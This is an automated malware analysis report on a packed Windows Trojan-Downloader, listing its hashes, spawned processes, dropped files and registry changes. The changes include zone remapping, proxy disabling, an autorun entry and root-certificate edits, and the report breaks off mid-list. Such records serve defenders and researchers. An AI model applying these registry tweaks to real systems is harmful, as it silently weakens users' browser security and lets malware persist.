HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Trojan.Agent.BDJT (B) (Emsisoft), Trojan.Agent.BDJT (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.Alureon.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan-PSW, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 4937d0d8c199fab565657944560f67d1
SHA1: 5737a160ebc28f0bf83d2c4fa4accc59893a551c
SHA256: af3654e6a7ce82418e14b8d42487da9c09329eca7c5cf022bbcfa1e89f7967fb
SSDeep: 12288:M8cXSrqphitkdebZlqe8a 4pQGZjLfPtaXQsFhKF:M8cXSMit1bCQrjTlaA
Size: 494592 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: ASPackv212, UPolyXv05_v6
Company: no certificate found
Created at: 2014-06-07 06:12:39
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
Wuji.exe:568
FhCalendar.exe:452
wujiime.exe:464
MSIB.tmp:916
xxdd_165.exe:452
updroots.exe:1016
114gglm_016.exe:488
Update.exe:444
fhrl_6_12001.exe:320
fhsli_6_12001.exe:1852
netsh.exe:436
netsh.exe:628
SportLive.exe:908
MsiExec.exe:1760
oemfhsli.exe:628
The Trojan injects its code into the following process(es):
FhCalendar.exe:588
%original file name%.exe:1832
File activity
The process FhCalendar.exe:588 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetWeather[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetHoliday[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\SendClickData[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (0 bytes)
The process wujiime.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Wuji\Wuji.exe (7209 bytes)
%Program Files%\Wuji\update.exe (7451 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\无极输入法\无极输入法.lnk (638 bytes)
%Program Files%\Wuji\Wuji.dat (1945 bytes)
%Program Files%\Wuji\uninst.exe (3685 bytes)
%Documents and Settings%\%current user%\Desktop\无极输入法.lnk (626 bytes)
%Program Files%\Wuji\Wuji.dll (2422 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\无极输入法\卸载无极输入法.lnk (479 bytes)
%System%\catsrvuz.dll (53 bytes)
%Program Files%\Wuji\Show.dat (5 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Desktop\无极输入法.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssD.tmp (0 bytes)
%Program Files%\Wuji\Wuji.dll (0 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\无极输入法\卸载无极输入法.lnk (0 bytes)
The process xxdd_165.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\xxdd\Liveconfig.ini (22 bytes)
%Program Files%\xxdd\xxdd.msi (146581 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp (0 bytes)
The process 114gglm_016.exe:488 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\wujiime.exe (2105 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsrC.tmp (0 bytes)
The process Update.exe:444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\version[1].txt (72 bytes)
%Program Files%\fhrl\Update.log (402 bytes)
%Program Files%\fhrl\fhUp\Update\version.ini (72 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\version[1].txt (0 bytes)
The process fhrl_6_12001.exe:320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp (0 bytes)
The process fhsli_6_12001.exe:1852 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\System.dll (10 bytes)
%Program Files%\Common Files\Install\fhrlsli\info.ini (996 bytes)
%Program Files%\Common Files\Install\fhrlsli\oemfhsli.exe (17882 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\System.dll (0 bytes)
The process SportLive.exe:908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The process %original file name%.exe:1832 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\fhsli_6_12001.exe (1616 bytes)
C:\114gglm_016.exe (1664 bytes)
C:\xxdd_165.exe (30622 bytes)
The process oemfhsli.exe:628 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (330 bytes)
%Documents and Settings%\All Users\Documents\fhrl_6_12001.exe (13084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\info[1].ini (997 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\Setup[1].ashx (38 bytes)
%Program Files%\Common Files\Install\fhrlsli\info.ini (997 bytes)
%Program Files%\fhrl\info.db (120 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\Setup[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\info[1].ini (0 bytes)
Registry activity
The process Wuji.exe:568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\Wuji\DEBUG]
"Trace Level"
The process FhCalendar.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process FhCalendar.exe:588 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process wujiime.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极输入法]
"DisplayVersion" = "3.6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\VERSION]
"(Default)" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极输入法]
"Publisher" = "Wuji"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极输入法]
"UninstallString" = "%Program Files%\Wuji\uninst.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}]
"(Default)" = "pIContextMenu.ShellExt"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\VB and VBA Program Settings\wj\wj]
"ver" = "3.6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\ProgID]
"(Default)" = "pIContextMenu.ShellExt"
[HKCR\TypeLib\{42E245AA-0C25-428F-98FA-55DC9CA83E6D}\1.0\HELPDIR]
"(Default)" = "%System%"
[HKCR\TypeLib\{42E245AA-0C25-428F-98FA-55DC9CA83E6D}\1.0\0\win32]
"(Default)" = "%System%\catsrvuz.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极输入法]
"URLInfoAbout" = "Wj"
[HKCR\Directory\Background\shellex\ContextMenuHandlers\with]
"(Default)" = "{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\InprocServer32]
"(Default)" = "%System%\catsrvuz.dll"
[HKCR\TypeLib\{42E245AA-0C25-428F-98FA-55DC9CA83E6D}\1.0]
"(Default)" = "IContextMenu wj"
[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}\TypeLib]
"(Default)" = "{42E245AA-0C25-428F-98FA-55DC9CA83E6D}"
[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}]
"(Default)" = "_ShellExt"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\pIContextMenu.ShellExt\Clsid]
"(Default)" = "{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 A2 42 55 B5 34 36 CF C2 A6 05 52 4A B4 70 68"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极输入法]
"DisplayName" = "无极输入法 3.6"
[HKCU\Software\VB and VBA Program Settings\jcity\tj]
"nt" = "55"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCR\CLSID\{FC094F33-9210-4A7D-AAE9-BB0310CB1D10}\TypeLib]
"(Default)" = "{42E245AA-0C25-428F-98FA-55DC9CA83E6D}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"netsh.exe" = "Network Command Shell"
[HKCR\pIContextMenu.ShellExt]
"(Default)" = "pIContextMenu.ShellExt"
[HKCR\TypeLib\{42E245AA-0C25-428F-98FA-55DC9CA83E6D}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{7AB382B2-27F1-4590-8ED8-871321821585}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The process MSIB.tmp:916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 5B 7B 66 1D D9 48 61 68 AD 61 12 39 C3 6E 86"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\xxdd]
"SportLive.exe" = "直播中心"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process xxdd_165.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 12 9D AB 46 B0 B5 90 35 C3 17 34 CC 48 AC 4B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process updroots.exe:1016 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0E31CAD006F39C735CFF0FF9DDA41A52E9D0FD22]
"Blob" = "04 00 00 00 01 00 00 00 10 00 00 00 71 72 94 D7"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5]
"Blob" = "19 00 00 00 01 00 00 00 10 00 00 00 D8 B5 FB 36"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"0E31CAD006F39C735CFF0FF9DDA41A52E9D0FD22"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5]
"File"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5"
The process 114gglm_016.exe:488 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 59 8D 28 D9 17 87 C6 FB 54 26 9D 38 F0 38 15"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\VB and VBA Program Settings\wj\wj]
"file" = "114gglm_016"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\VB and VBA Program Settings\wj\wj]
"ver" = "3.6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"wjime" = "%Program Files%\Wuji\Wuji.exe auto"
The process Update.exe:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 55 5A 20 7D FB DF 55 8B 27 30 96 FA A1 F4 48"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process fhrl_6_12001.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\thyz\FhCalendar.exe]
"(Default)" = "%Program Files%\fhrl\FhCalendar.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\፼ÃÂÈÕÀú]
"DisplayName" = "፼ÃÂÈÕÀú 1.00.001"
"DisplayVersion" = "1.00.001"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\፼ÃÂÈÕÀú]
"UninstallString" = "%Program Files%\fhrl\Fhuninstall.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\፼ÃÂÈÕÀú]
"URLInfoAbout" = "http://www.fhrlw.com"
"DisplayIcon" = "%Program Files%\fhrl\FhCalendar.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\፼ÃÂÈÕÀú]
"Publisher" = "ÌÆº²Ò×ÕßÃÂÅâ¼¼ÊõÓÃÂÃÂÞ¹«Ë¾"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 7F ED 19 00 E5 EE 7D 60 1D 7F 38 E2 5F C3 9F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
The process fhsli_6_12001.exe:1852 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
